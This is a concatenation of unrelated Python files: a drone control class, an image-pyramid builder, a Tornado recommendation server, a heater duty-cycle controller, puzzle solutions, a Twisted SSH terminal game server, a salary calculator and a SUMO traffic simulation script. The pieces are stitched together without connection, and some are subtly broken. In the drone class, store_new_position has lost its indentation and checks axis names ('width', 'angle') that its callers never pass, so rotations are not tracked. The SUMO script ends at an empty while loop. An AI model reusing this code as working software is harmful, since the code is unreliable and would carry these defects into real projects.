        self.store_new_position("forward_backward", dist)
        self.send_command('forward {}'.format(dist), make_photo=True)

    def back(self, dist: int):
        self.store_new_position("forward_backward", -dist)
        self.send_command('back {}'.format(dist), make_photo=True)

    def cw(self, degr: int):
        self.store_new_position("clockwise_angle", degr)
        self.send_command('cw {}'.format(degr), make_photo=True)

    def ccw(self, degr: int):
        self.store_new_position("clockwise_angle", -degr)
        self.send_command('ccw {}'.format(degr), make_photo=True)

    def flip(self, direc: str):
        self.send_command('flip {}'.format(direc))

    def go(self, x: int, y: int, z: int, speed: int):
        self.send_command('go {} {} {} {}'.format(x, y, z, speed))

    def curve(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
        self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed))
    # Set Commands
    def set_speed(self, speed: int):
        self.send_command('speed {}'.format(speed))

    def rc_control(self, a: int, b: int, c: int, d: int):
        # Four-channel remote-control sticks (left/right, fwd/back, up/down, yaw).
        self.send_command('rc {} {} {} {}'.format(a, b, c, d))

    def set_wifi(self, ssid: str, passwrd: str):
        self.send_command('wifi {} {}'.format(ssid, passwrd))
    # Read commands — each sends a query (query=True suppresses the response
    # print) and returns the response recorded on that log entry;
    # send_command blocks until a response arrives or MAX_TIME_OUT passes.
    def get_speed(self):
        self.send_command('speed?', True)
        return self.log[-1].get_response()

    def get_battery(self):
        self.send_command('battery?', True)
        return self.log[-1].get_response()

    def get_time(self):
        self.send_command('time?', True)
        return self.log[-1].get_response()

    def get_height(self):
        self.send_command('height?', True)
        return self.log[-1].get_response()

    def get_temp(self):
        self.send_command('temp?', True)
        return self.log[-1].get_response()

    def get_attitude(self):
        self.send_command('attitude?', True)
        return self.log[-1].get_response()

    def get_baro(self):
        self.send_command('baro?', True)
        return self.log[-1].get_response()

    def get_acceleration(self):
        self.send_command('acceleration?', True)
        return self.log[-1].get_response()

    def get_tof(self):
        self.send_command('tof?', True)
        return self.log[-1].get_response()

    def get_wifi(self):
        self.send_command('wifi?', True)
        return self.log[-1].get_response()
def store_new_position(self, axis, distance):
"""
Appends current values to the history position
"""
height_to_append = self.up_down[-1]
length_to_append = self.forward_backward[-1]
width_to_append = self.right_left[-1]
angle_to_append = self.clockwise_angle[-1]
if axis == "up_down":
height_to_append += distance
elif axis == "forward_backward":
length_to_append += distance
elif axis == "width":
width_to_append += distance
elif axis == "angle":
angle_to_append += distance
self.up_down.append(height_to_append)
self.forward_backward.append(length_to_append)
self.right_left.append(width_to_append)
self.clockwise_angle.append(angle_to_append)
def get_current_position_string(self):
"""
Forms a string describing current position
"""
up_down = self.up_down[-1]
forward_backward = self.forward_backward[-1]
right_left = self.right_left[-1]
clockwise_angle = self.clockwise_angle[-1]
# I chose ":" as a delimiters instead of "-", because there can be a "minus" sign in a number
return "{}:{}:{}:{}".format(up_down, forward_backward, right_left, clockwise_angle)
def print_with_time(text):
    """Print `text` followed by the current Unix timestamp (for tracing)."""
    print("{} - {}".format(text, time.time()))
|
import os
import subprocess
import sys
import math
import string
import shutil
import json
import re
import shutil
# build pyramid from an input image
# return an array of level file names
def pyramid(input_file_path, num_levels):
    """
    Build an image pyramid with ImageMagick.

    Each level halves the resolution of the previous one; level files are
    written next to the input as <base>_<level>.<ext>.

    :param input_file_path: path to the source image
    :param num_levels: number of pyramid levels to generate
    :raise ValueError: if `magick` is not on PATH or the name has no extension
    :return: list of generated level file names
    """
    # Lanczos with this blur constant is a high-quality downsampling setting.
    resize_filter = 'Lanczos'  # renamed: `filter` shadowed the builtin
    blur = .9891028367558475

    # magick
    if not shutil.which("magick"):
        raise ValueError('need magick on your path; see https://www.imagemagick.org/')
    magick = "magick"

    # names — splitext handles names containing extra dots, which the old
    # split('.') rejected.
    file_path, input_file_name = os.path.split(input_file_path)
    base_name, dot_ext = os.path.splitext(input_file_name)
    if not base_name or not dot_ext:
        raise ValueError('illegal input name:' + input_file_name)
    type_name = dot_ext[1:]

    level_file_names = []
    for level in range(num_levels):
        level_file_name = file_path
        if file_path != '':
            level_file_name = level_file_name + '/'
        level_file_name = level_file_name + base_name + '_' + str(level) + '.' + type_name
        level_file_names.append(level_file_name)

        # compute: each level is downsampled to 100/2^level percent.
        resize = 100.0 / pow(2, level)
        downsample_command = (
            magick + ' ' + input_file_path
            + ' -colorspace RGB -filter ' + resize_filter
            + ' -define filter:blur=' + str(blur)
            + ' -resize ' + str(resize) + '%'
            + ' -compress none ' + ' -colorspace RGB ' + level_file_name
        )
        # NOTE(review): os.system on a composed string is shell-injection
        # prone if input_file_path is untrusted; subprocess.run with an
        # argument list would be safer.
        os.system(downsample_command)

    # done
    return level_file_names
|
import sys
import asyncio
import aiohttp
from tornado.ioloop import IOLoop
from tornado.web import Application
from tornado.queues import Queue
from yamlparams.utils import Hparam
from loguru import logger
from models.implicitALS.dataloader import Loader
from models.implicitALS.singleton import SharedModel
from http_utils import recs, updating, misc
from database.connect import Connect
#DEVELOPMENT
if sys.platform == 'win32':
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
def make_app(config, loader, queue):
    """Wire every HTTP route to its handler and return the Tornado Application."""
    base_recs_config = dict(SharedModel=SharedModel, config=config)
    routes = [
        ('/topPopular', recs.TopPopularRecommendationHandler, dict(loader=loader, **base_recs_config)),
        ('/explorations', recs.ExplorationRecommendationsHandler, dict(loader=loader, **base_recs_config)),
        ('/recommend', recs.RecommendHandler, dict(loader=loader, **base_recs_config)),
        ('/similarItems', recs.SimilarItemsHandler, base_recs_config),
        ('/personalSimilarItems', recs.PersonalSimilarItemsHandler, base_recs_config),
        ('/internal/rateItem', updating.RateItemHandler, dict(queue=queue, **base_recs_config)),
        ('/internal/recalculate', updating.RecalculateHandler, dict(loader=loader, **base_recs_config)),
        ('/healthcheck', misc.HealthcheckHandler),
    ]
    return Application(routes)
def make_log(config):
    """Configure loguru.logger to special log files:
    logger.info writes to logs/CONFIG.READ-usage.log
    decorator @logger.catch writes errors to logs/CONFIG.READ-error.log
    logger.debug writes to logs/CONFIG.READ-server.log

    Args:
        config (Hparam): current config
    """
    sinks = (
        ('-server.log', 'DEBUG'),
        ('-usage.log', 'INFO'),
        ('-error.log', 'ERROR'),
    )
    for suffix, level_name in sinks:
        # Bind level_name as a default argument to avoid the late-binding
        # closure pitfall inside the loop.
        logger.add(
            'logs/' + config.name + suffix,
            filter=lambda record, level_name=level_name: record["level"].name == level_name,
        )
async def async_test(delay):
    """After `delay` seconds, hit the local /internal/recalculate endpoint once.

    Spawned as a startup callback so the model is (re)built shortly after boot.
    """
    await asyncio.sleep(delay)
    async with aiohttp.ClientSession() as session:
        async with session.get('http://localhost:5000/internal/recalculate') as response:
            await response.text()
@logger.catch
def rate_item(model,obj):
    # obj is the argument tuple queued by the rateItem handler; errors are
    # captured to the error log by @logger.catch instead of crashing the consumer.
    model.rate_item(*obj)
async def consumer(queue):
    """Forever: pop queued rating events and apply them to the shared model."""
    while True:
        obj = await queue.get()
        model = SharedModel().shared_model
        logger.info(f"processing obj in queue, size {queue.qsize()}")
        rate_item(model,obj)
        logger.info(f"obj finished in queue, size {queue.qsize()}")
        queue.task_done()
@logger.catch
def main():
    """Entry point: load configs, build the app, and run the IOLoop forever.

    Usage: python <script> <model config path>
    """
    if len(sys.argv) < 2:
        raise AttributeError('Use config name to define model config')
    cfg_path = sys.argv[1]
    config = Hparam(cfg_path)
    # DB credentials are read from a fixed path inside the container.
    db_config = Hparam('/app/database/config.yaml')
    make_log(config)

    connect = Connect(db_config.user, db_config.password, db_config.host, db_config.database)
    loader = Loader(config.site_id,connect)
    queue = Queue()

    app = make_app(config,loader,queue)
    app.listen(5000)
    logger.debug(f'server started')
    # Kick off an initial model rebuild shortly after start, then consume
    # rating events from the queue.
    IOLoop.instance().spawn_callback(async_test, delay = 5)
    IOLoop.instance().spawn_callback(consumer, queue = queue)
    IOLoop.instance().start()
    # Only reached after the IOLoop is stopped.
    logger.debug(f'server ended')


if __name__ == "__main__":
    main()
import math
class DutyCycle:
    """Maps a PID controller output onto a heater on/off duty cycle.

    The maximum on-fraction is derived from the temperature difference and
    slowly self-corrects from the accumulated sigmoid error.
    """

    def __init__(self, goal_temp, duration, outside_temp=75, wind=0):
        self.temp_difference = goal_temp - outside_temp
        self.duration = duration
        self.wind = wind
        self.goal_temp = goal_temp
        self.outside_temp = outside_temp
        # 250 degrees of difference saturates the duty cycle at 100%.
        self.duty_prop_max = min(1.0, self.temp_difference / 250.0)
        self.duty_prop = 0.5 * self.duty_prop_max
        self.count = 0
        self.error = 0.0

    def sigmoid(self, x):
        """Numerically stable logistic function.

        src: stackoverflow.com/questions/3985619 Neil G's answer
        """
        if x < 0:
            e = math.exp(x)
            return e / (1 + e)
        e = math.exp(-x)
        return 1 / (1 + e)

    def process_pid_output(self, pid_output):
        """Convert a raw PID output into the current duty proportion."""
        squashed = self.sigmoid(pid_output)
        if abs(pid_output) < 5:  # Throw out windup and outliers
            self.count += 1
            self.error += 0.5 - squashed
            if self.count == 10:  # number to average over
                # Nudge the ceiling by the mean accumulated error, then clamp.
                self.duty_prop_max -= (self.error * self.duty_prop_max / 10)
                print("dutycycle.py: resetting max duty cycle to {}. Accum'd. error was: {}".format(
                    self.duty_prop_max, self.error))
                if self.duty_prop_max > 1:
                    self.duty_prop_max = 1
                elif self.duty_prop_max < 0.1:
                    self.duty_prop_max = 0.1
                self.error = 0
                self.count = 0
        self.duty_prop = squashed * self.duty_prop_max
        return self.duty_prop

    def get_durations(self):
        """Return (on_time, off_time): `duration` split by the duty proportion."""
        on_time = self.duty_prop * self.duration
        return (on_time, self.duration - on_time)

    def __str__(self):
        on, off = self.get_durations()
        return "Duration: {}\nMax Proportion: {}\nCurrent Duty Proportion: {}\nGoal Temp: {}\nOn Time: {} Off Time: {}".format(
            self.duration,
            self.duty_prop_max,
            self.duty_prop,
            self.goal_temp,
            on,
            off)
|
def simulate(timers, days):
    """Return the lanternfish population after `days`, given initial timers.

    Counts fish per timer value (0-8) instead of keeping one list entry per
    fish, so it runs in O(days) rather than growing exponentially with the
    population. A fish at 0 resets to 6 and spawns a new fish at 8.
    """
    counts = [0] * 9  # counts[t] == number of fish whose timer is t
    for t in timers:
        counts[t] += 1
    for _ in range(days):
        spawning = counts.pop(0)
        counts[6] += spawning   # parents reset to 6
        counts.append(spawning)  # offspring start at 8
    return sum(counts)


if __name__ == "__main__":
    # Guarded so importing this module does not trigger file I/O;
    # `with` ensures the input file is closed.
    with open('6_input.txt') as fh:
        initial = [int(x) for x in fh.read().split(",")]
    answer = simulate(initial, 80)
    print(answer)
|
from typing import List


class MinCostToConnectAllPoints:
    """
    https://leetcode-cn.com/problems/min-cost-to-connect-all-points/
    """
    def minCostConnectPoints(self, points: List[List[int]]) -> int:
        """Minimum total Manhattan-distance cost to connect all points.

        The method body was missing entirely; implemented with Prim's
        algorithm in its O(n^2) dense-graph form: repeatedly pull in the
        unvisited point closest to the growing spanning tree.
        """
        n = len(points)
        if n <= 1:
            return 0
        # best[i] = cheapest known edge from the current tree to point i.
        best = [float('inf')] * n
        visited = [False] * n
        best[0] = 0
        total = 0
        for _ in range(n):
            u = min((i for i in range(n) if not visited[i]), key=lambda i: best[i])
            visited[u] = True
            total += best[u]
            ux, uy = points[u]
            # Relax edges from the newly added point.
            for v in range(n):
                if not visited[v]:
                    cost = abs(ux - points[v][0]) + abs(uy - points[v][1])
                    if cost < best[v]:
                        best[v] = cost
        return total
|
# encoding: utf-8
import os, uuid, time
import urwid
from urwid.raw_display import Screen
from zope.interface import Interface, Attribute, implementer
from twisted.application.service import Application
from twisted.application.internet import TCPServer
from twisted.cred.portal import Portal
from twisted.conch.interfaces import IConchUser, ISession
from twisted.conch.insults.insults import TerminalProtocol, ServerProtocol
from twisted.conch.manhole_ssh import (ConchFactory, TerminalRealm, TerminalUser, TerminalSession, TerminalSessionTransport)
from twisted.cred.checkers import InMemoryUsernamePasswordDatabaseDontUse
from twisted.conch.ssh.keys import EncryptedKeyError, Key
from twisted.cred import error as credError
from twisted.python.components import Componentized, Adapter
from twisted.internet.task import LoopingCall
from twisted.internet import reactor, defer
from datetime import datetime
from rpg_game.gui import GUI
from rpg_game.gui import PALETTE
from rpg_game.master import Master
from rpg_game.constants import *
class IUrwidMind(Interface):
    """Zope interface for the per-connection adapter that bridges an SSH avatar to a urwid UI."""
    # NOTE(review): the Attribute descriptions below were left empty by the author.
    ui = Attribute('')
    terminalProtocol = Attribute('')
    terminal = Attribute('')
    avatar = Attribute('The avatar')
    def push(data):
        """Push incoming terminal data into the UI."""
    def draw():
        """Refresh the UI"""
    def on_update():
        """Update cycle"""
class UrwidUi(object):
    """Owns the urwid widget tree, palette, screen and main loop for one mind."""
    def __init__(self, urwid_mind):
        self.mind = urwid_mind
        self.toplevel = GUI(self, self.mind)
        self.palette = PALETTE
        # Set when new data arrives; cleared once the UI has been redrawn.
        self.redraw = False
        self.screen = TwistedScreen(self.mind.terminalProtocol)
        self.loop = self.create_urwid_mainloop()
    def on_update(self):
        self.toplevel.on_update()
        self.redraw = False
    def create_urwid_mainloop(self):
        # Twisted drives the reactor itself, so urwid's event loop must not manage it.
        evl = urwid.TwistedEventLoop(manage_reactor=False)
        loop = urwid.MainLoop(self.toplevel, screen=self.screen,
                              event_loop=evl,
                              unhandled_input=self.mind.unhandled_key,
                              palette=self.palette)
        self.screen.loop = loop
        loop.run()
        return loop
    def disconnect(self):
        self.toplevel.disconnect()
    def restart(self):
        self.toplevel.restart()
class UnhandledKeyHandler(object):
    """Dispatches keys the widget tree did not consume.

    A key named ``k`` is routed to ``key_<k>`` (spaces become underscores)
    if such a method exists; otherwise it falls through to the top-level
    screen handler.  Mouse events (tuples) are ignored.
    """

    def __init__(self, mind):
        self.mind = mind

    def push(self, key):
        # Mouse events arrive as tuples; nothing to do for those here.
        if isinstance(key, tuple):
            return
        handler = getattr(self, 'key_%s' % key.replace(' ', '_'), None)
        if handler is not None:
            return handler(key)
        screen_handler = self.mind.ui.toplevel.handle_input
        if screen_handler is not None:
            return screen_handler(key)

    def key_ctrl_c(self, key):
        # Ctrl-C disconnects this client.
        self.mind.disconnect()

    def key_ctrl_p(self, key):
        # Ctrl-P restarts the client's UI.
        self.mind.restart_ui()
# BUG FIX: the original called ``implementer(IUrwidMind)`` as a bare statement,
# which discards the returned class decorator, so UrwidMind never actually
# declared that it provides IUrwidMind.  It must be applied with ``@``.
@implementer(IUrwidMind)
class UrwidMind(Adapter):
    """Per-connection adapter glueing a Conch avatar (the adapted
    Componentized) to its urwid UI and the game master."""
    unhandled_key_factory = UnhandledKeyHandler

    def __init__(self, original, master):
        super().__init__(original)
        self.master = master
        self.ui = None
        self.key_map = KEY_MAP
        self.last_frame = time.time()

    @property
    def avatar(self):
        """The IConchUser component of the adapted avatar."""
        return IConchUser(self.original)

    @property
    def player(self):
        """The player object for this connection, or None before registration."""
        if self.avatar.uuid in self.master.players:
            return self.master.players[self.avatar.uuid]
        return None

    @property
    def screen_size(self):
        return self.ui.screen.get_cols_rows()

    def set_terminalProtocol(self, terminalProtocol):
        """Wire up the terminal protocol and build the UI for it."""
        self.terminalProtocol = terminalProtocol
        self.terminal = terminalProtocol.terminal
        self.unhandled_key_handler = self.unhandled_key_factory(self)
        self.unhandled_key = self.unhandled_key_handler.push
        self.ui = UrwidUi(self)
        self.draw()

    def push(self, data):
        """Feed raw terminal bytes into the UI and mark it dirty."""
        if self.ui:
            self.ui.redraw = True
            self.ui.screen.push(data)

    def draw(self):
        self.ui.on_update()
        self.ui.loop.draw_screen()

    def on_update(self):
        # Redraw lazily: only when something flagged the UI as dirty.
        if self.ui and self.ui.redraw:
            self.draw()

    def disconnect(self):
        """Detach from the master, close the terminal and drop the UI."""
        self.master.disconnect(self.avatar.uuid)
        self.terminal.loseConnection()
        self.ui.disconnect()
        self.ui = None

    def restart_ui(self):
        self.master.disconnect(self.avatar.uuid)
        self.ui.restart()
class TwistedScreen(Screen):
    """A Urwid screen which knows about the Twisted terminal protocol that is
    driving it.
    A Urwid screen is responsible for:
    1. Input
    2. Output
    Input is achieved in normal urwid by passing a list of available readable
    file descriptors to the event loop for polling/selecting etc. In the
    Twisted situation, this is not necessary because Twisted polls the input
    descriptors itself. Urwid allows this by being driven using the main loop
    instance's `process_input` method which is triggered on Twisted protocol's
    standard `dataReceived` method.
    """
    def __init__(self, terminalProtocol):
        # We will need these later
        self.terminalProtocol = terminalProtocol
        self.terminal = terminalProtocol.terminal
        super(TwistedScreen, self).__init__()
        self.colors = 16
        # Maps palette entry name -> pre-computed terminal escape sequence.
        self._pal_escape = {}
        self.bright_is_bold = True
        self.register_palette_entry(None, 'white', 'black')
        urwid.signals.connect_signal(self, urwid.UPDATE_PALETTE_ENTRY,
                                     self._on_update_palette_entry)
        # Don't need to wait for anything to start
        #self._started = True
        self._start()
    # Urwid Screen API
    def get_cols_rows(self):
        """Get the size of the terminal as (cols, rows)
        """
        return self.terminalProtocol.width, self.terminalProtocol.height
    def draw_screen(self, maxres, r ):
        """Render a canvas to the terminal.
        The canvas contains all the information required to render the Urwid
        UI. The content method returns a list of rows as (attr, cs, text)
        tuples. This very simple implementation iterates each row and simply
        writes it out.
        """
        (maxcol, maxrow) = maxres
        #self.terminal.eraseDisplay()
        # Only emit an attribute escape when the attribute actually changes.
        lasta = None
        for i, row in enumerate(r.content()):
            self.terminal.cursorPosition(0, i)
            for (attr, cs, text) in row:
                if attr != lasta:
                    text = b"%s%s" % (self._attr_to_escape(attr).encode("utf-8"), text)
                    lasta = attr
                #if cs or attr:
                #print(text.decode('utf-8', "ignore"))
                self.write(text)
        cursor = r.get_cursor()
        if cursor is not None:
            self.terminal.cursorPosition(*cursor)
    # XXX from base screen
    def set_mouse_tracking(self, enable=True):
        """
        Enable (or disable) mouse tracking.
        After calling this function get_input will include mouse
        click events along with keystrokes.
        """
        if enable:
            self.write(urwid.escape.MOUSE_TRACKING_ON)
        else:
            self.write(urwid.escape.MOUSE_TRACKING_OFF)
    # twisted handles polling, so we don't need the loop to do it, we just
    # push what we get to the loop from dataReceived.
    def hook_event_loop(self, event_loop, callback):
        # Remember the loop/callback so push() can feed parsed keys into urwid.
        self._urwid_callback = callback
        self._evl = event_loop
    def unhook_event_loop(self, event_loop):
        pass
    # Do nothing here either. Not entirely sure when it gets called.
    def get_input(self, raw_keys=False):
        return
    def get_available_raw_input(self):
        # Hand over the buffered bytes and clear the buffer.
        data = self._data
        self._data = []
        return data
    # Twisted driven
    def push(self, data):
        """Receive data from Twisted and push it into the urwid main loop.
        We must here:
        1. filter the input data against urwid's input filter.
        2. Calculate escapes and other clever things using urwid's
        `escape.process_keyqueue`.
        3. Pass the calculated keys as a list to the Urwid main loop.
        """
        self._data = list(map(ord, data.decode("utf-8")))
        self.parse_input(self._evl, self._urwid_callback, self.get_available_raw_input())
    # Convenience
    def write(self, data):
        self.terminal.write(data)
    # Private
    def _on_update_palette_entry(self, name, *attrspecs):
        #print(f"Updating {name} palette: ", attrspecs[{16:0,1:1,88:2,256:3}[self.colors]])
        # copy the attribute to a dictionary containing the escape sequences
        self._pal_escape[name] = self._attrspec_to_escape(
            attrspecs[{16:0,1:1,88:2,256:3}[self.colors]])
    def _attr_to_escape(self, a):
        # Resolve an attr (palette name or AttrSpec) to its escape sequence.
        if a in self._pal_escape:
            return self._pal_escape[a]
        elif isinstance(a, urwid.AttrSpec):
            return self._attrspec_to_escape(a)
        # undefined attributes use default/default
        # TODO: track and report these
        return self._attrspec_to_escape(
            urwid.AttrSpec('default','default'))
    def _attrspec_to_escape(self, a):
        """
        Convert AttrSpec instance a to an escape sequence for the terminal
        >>> s = Screen()
        >>> s.set_terminal_properties(colors=256)
        >>> a2e = s._attrspec_to_escape
        >>> a2e(s.AttrSpec('brown', 'dark green'))
        '\\x1b[0;33;42m'
        >>> a2e(s.AttrSpec('#fea,underline', '#d0d'))
        '\\x1b[0;38;5;229;4;48;5;164m'
        """
        if a.foreground_high:
            fg = "38;5;%d" % a.foreground_number
        elif a.foreground_basic:
            if a.foreground_number > 7:
                if self.bright_is_bold:
                    fg = "1;%d" % (a.foreground_number - 8 + 30)
                else:
                    fg = "%d" % (a.foreground_number - 8 + 90)
            else:
                fg = "%d" % (a.foreground_number + 30)
        else:
            fg = "39"
        # Style flags: bold / underline / standout, each "n;"-prefixed.
        st = "1;" * a.bold + "4;" * a.underline + "7;" * a.standout
        if a.background_high:
            bg = "48;5;%d" % a.background_number
        elif a.background_basic:
            if a.background_number > 7:
                # this doesn't work on most terminals
                bg = "%d" % (a.background_number - 8 + 100)
            else:
                bg = "%d" % (a.background_number + 40)
        else:
            bg = "49"
        return f"{urwid.escape.ESC}[0;{fg};{st}{bg}m"#{urwid.escape.ESC}[0m
class UrwidTerminalProtocol(TerminalProtocol):
    """A terminal protocol that knows to proxy input and receive output from
    Urwid.
    This integrates with the TwistedScreen in a 1:1.
    """
    def __init__(self, urwid_mind):
        self.urwid_mind = urwid_mind
        # Default geometry until the client reports its real size.
        self.width = 80
        self.height = 24

    def connectionMade(self):
        self.urwid_mind.set_terminalProtocol(self)
        self.terminalSize(self.height, self.width)

    def terminalSize(self, height, width):
        """Resize the terminal.

        Resizing takes a lot of resources server side, so only the geometry
        is recorded and urwid's cached screen size invalidated; the UI is
        redrawn lazily.  (The original kept unreachable
        ``self.terminal.eraseDisplay()`` / ``self.urwid_mind.draw()`` calls
        after an unconditional ``return``; that dead code is removed here —
        behavior is unchanged.)
        """
        self.width = width
        self.height = height
        self.urwid_mind.ui.loop.screen_size = None

    def dataReceived(self, data):
        """Received data from the connection.
        This overrides the default implementation which parses and passes to
        the keyReceived method. We don't do that here, and must not do that so
        that Urwid can get the right juice (which includes things like mouse
        tracking).
        Instead we just pass the data to the screen instance's dataReceived,
        which handles the proxying to Urwid.
        """
        self.urwid_mind.push(data)
class UrwidServerProtocol(ServerProtocol):
    """ServerProtocol that forwards raw bytes unparsed to the wrapped terminal protocol."""
    def dataReceived(self, data):
        # No insults-side parsing: urwid does its own escape handling.
        self.terminalProtocol.dataReceived(data)
class UrwidUser(TerminalUser):
    """A terminal user that remembers its avatarId.

    The stock TerminalUser does not keep the avatarId around; this subclass
    stores it and also assigns a fresh session uuid per connection.
    """

    def __init__(self, original, avatarId):
        super().__init__(original, avatarId)
        self.avatarId = avatarId
        self.uuid = uuid.uuid4()
class UrwidTerminalSession(TerminalSession):
    """A terminal session that remembers the avatar and chained protocol for
    later use. And implements a missing method for changed Window size.
    Note: This implementation assumes that each SSH connection will only
    request a single shell, which is not an entirely safe assumption, but is
    by far the most common case.
    """
    def openShell(self, proto):
        """Open a shell.
        """
        # Chain: SSH channel -> ServerProtocol -> UrwidTerminalProtocol -> mind.
        self.chained_protocol = UrwidServerProtocol(
            UrwidTerminalProtocol, IUrwidMind(self.original))
        TerminalSessionTransport(
            proto, self.chained_protocol,
            IConchUser(self.original),
            self.height, self.width)
    def windowChanged(self, dimensions):
        """Called when the window size has changed.
        """
        (h, w, x, y) = dimensions
        self.chained_protocol.terminalProtocol.terminalSize(h, w)
    def eofReceived(self):
        # Client sent EOF: tear down the mind/UI for this connection.
        IUrwidMind(self.original).disconnect()
    def execCommand(self, proto, cmd):
        # Command execution is not supported; log and fall back to a shell.
        print("Error: Cannot execute commands", proto, cmd)
        self.openShell(proto)
        #raise econch.ConchError("Cannot execute commands")
class UrwidRealm(TerminalRealm):
    """Custom terminal realm class-configured to use our custom Terminal User
    Terminal Session.
    """
    def __init__(self):
        self.mind_factories = {b"new" : UrwidMind}
        self.master = Master()
        # uuid -> UrwidMind for every live connection.
        self.minds = {}
        self.time = time.time()
        # Fixed-timestep game loop driven by the Twisted reactor.
        self.update_loop = LoopingCall(self.on_update)
        self.update_loop.start(UPDATE_TIMESTEP)
    def on_update(self):
        #update cycle
        #note: user inputs that do not imply a change of the game state (i.e. changing menu currently viewed) are handled on the mind push function, and drawn immediately (only for the user)
        t = time.time()
        deltatime = t - self.time
        self.master.on_update(deltatime)
        # #then update each mind, that updates each ui if necessary
        for k, mind in self.minds.items():
            # Frame-rate limit: only flag a redraw when the player's location changed.
            if mind.player and mind.player.location.redraw and t-mind.last_frame >= FRAME_RATE:
                mind.ui.redraw = True
            mind.on_update()
        for k, loc in self.master.world.locations.items():
            loc.redraw = False
        if deltatime > 2*UPDATE_TIMESTEP:
            print("SLOW", deltatime)
        self.time = time.time()
    def _getAvatar(self, avatarId):
        # Assemble the Componentized avatar: user + session + mind.
        comp = Componentized()
        user = UrwidUser(comp, avatarId)
        comp.setComponent(IConchUser, user)
        sess = UrwidTerminalSession(comp)
        comp.setComponent(ISession, sess)
        mind = UrwidMind(comp, self.master)
        comp.setComponent(IUrwidMind, mind)
        # Reuse the player's existing uuid when resuming a saved game.
        if avatarId in self.master.players and avatarId != b"new":
            player = self.master.players[avatarId]
            mind.avatar.uuid = player.id
            print("Resuming game", mind.avatar.uuid)
        self.minds[mind.avatar.uuid] = mind
        print(f"Connected {avatarId} at {mind.avatar.uuid}")
        return user
    def requestAvatar(self, avatarId, mind, *interfaces):
        for i in interfaces:
            if i is IConchUser:
                # Reject unknown game ids and duplicate logins.
                if avatarId != b"new" and avatarId not in self.master.players:
                    return defer.fail(credError.UnauthorizedLogin(f"{avatarId} is not a valid game"))
                elif avatarId != b"new" and avatarId in self.minds:
                    return defer.fail(credError.UnauthorizedLogin(f"{avatarId} is already logged in"))
                return (IConchUser,
                        self._getAvatar(avatarId),
                        lambda: None)
        raise NotImplementedError()
class GameServer(TCPServer):
    """TCP service wrapping the SSH game factory; can register avatar credentials."""
    def __init__(self, port, factory):
        # No extra behaviour over TCPServer; kept for explicitness.
        super().__init__(port, factory)
    def add_user(self, avatar):
        # Register the avatar's uuid as an SSH username with an empty password.
        username = avatar.uuid
        self.factory.portal.checkers.add_user(username, "")
def create_server_factory():
    """Build the Conch SSH factory: game realm + portal + host keys.

    The in-memory checker accepts the single account ``new`` with an empty
    password; real game identity is resolved by the realm.
    """
    checkers = [InMemoryUsernamePasswordDatabaseDontUse(new=b'')]
    portal = Portal(UrwidRealm(), checkers)
    factory = ConchFactory(portal)
    factory.publicKeys[b'ssh-rsa'] = Key.fromFile('keys/test_rsa.pub')
    factory.privateKeys[b'ssh-rsa'] = Key.fromFile('keys/test_rsa')
    return factory
def create_service(port):
    """Return a GameServer service listening on *port* (tac-friendly)."""
    return GameServer(port, create_server_factory())
def create_application(application_name, port):
    """Create a Twisted Application with the game service attached (for .tac files)."""
    app = Application(application_name)
    create_service(port).setServiceParent(app)
    return app
|
# Reads a base salary, applies a 5% bonus and a 7% tax, and prints the result
# using the same arithmetic as before (kept verbatim, including the final
# base + (bonus_salary - taxed_salary) combination).
print('Digite o salário-base do funcioário, que tem 5% de gratificação sobre o salário '
      'e que paga 7% de imposto sobre o salário')
salario_base = float(input('Salário Base: '))
com_gratificacao = salario_base + salario_base * (5 / 100)
apos_imposto = salario_base - salario_base * (7 / 100)
diferenca = com_gratificacao - apos_imposto
print(f'O salário do funcionário é: {salario_base + diferenca:.2f}')
from .countries import Country, CountryModel
# Pre-built country models for the supported markets.
aus = CountryModel(Country.AUSTRALIA)
phl = CountryModel(Country.PHILIPPINES)
# Names of the module attributes above to run, in order.
# NOTE(review): these are attribute *names*, presumably resolved via
# getattr on this module by the caller -- verify against the consumer.
COUNTRY_RUNNERS = [
    "aus",
    "phl",
]
|
# -*- coding: utf-8 -*-
"""
@file simpleTest.py
@author Simon Box, Craig Rafter
@date 29/01/2016
test Miller's algorithm
"""
import sys, os
sys.path.insert(0, '../sumoAPI')
import fixedTimeControl
import HybridVAControl
import sumoConnect
import readJunctionData
import traci
from routeGen import routeGen
from sumoConfigGen import sumoConfigGen
import numpy as np
# Intersection controller type used for every junction in the model.
controller = HybridVAControl.HybridVAControl

# Define road model directory
modelname = 'simpleT'
model = './models/{}/'.format(modelname)

# Generate new routes
N = 500  # Last time to insert vehicle at
stepSize = 0.1
AVratio = 0
AVtau = 1.0
vehNr, lastVeh = routeGen(N, AVratio, AVtau, routeFile=model + modelname + '.rou.xml')
print(vehNr, lastVeh)
print('Routes generated')

# Edit the output filenames in sumoConfig
configFile = model + modelname + ".sumocfg"
exportPath = '../../simple/'
if not os.path.exists(model+exportPath):  # this is relative to script not cfg file
    os.makedirs(model+exportPath)
simport = 8813
sumoConfigGen(modelname, configFile, exportPath, stepSize, port=simport)

# Connect to model
connector = sumoConnect.sumoConnect(model + modelname + ".sumocfg", gui=True, port=simport)
connector.launchSumoAndConnect()
print('Model connected')

# Get junction data
jd = readJunctionData.readJunctionData(model + modelname + ".jcn.xml")
junctionsList = jd.getJunctionData()

# Add controller models to junctions
controllerList = []
minGreenTime = 10
maxGreenTime = 60
for junction in junctionsList:
    controllerList.append(controller(junction))
print('Junctions and controllers acquired')

# Step simulation while there are vehicles
vehIDs = []
juncIDs = traci.trafficlights.getIDList()
juncPos = [traci.junction.getPosition(juncID) for juncID in juncIDs]
flowLoops = [loopID for loopID in traci.inductionloop.getIDList() if 'upstream' in loopID]
T = 60.0  # period to calcFlow over [s]
h = 2     # control update period [s]
# BUG FIX: `h` was originally assigned *after* the `interval` expression
# below, so the script crashed here with a NameError before the simulation
# even started.  It is now defined (with `scaling`) before first use.
interval = int(np.round(T/h))
scaling = float(h)/float(T)
vehIDcode = traci.constants.LAST_STEP_VEHICLE_ID_LIST
# NOTE(review): dtype=str yields fixed-width numpy strings; long vehicle IDs
# may be truncated -- confirm IDs fit, or use dtype=object.
flowSteps = np.empty([len(flowLoops), interval], dtype=str)
for loop in flowLoops:
    traci.inductionloop.subscribe(loop, [vehIDcode])
i = 0
qx = np.zeros_like(flowLoops)
while traci.simulation.getMinExpectedNumber():
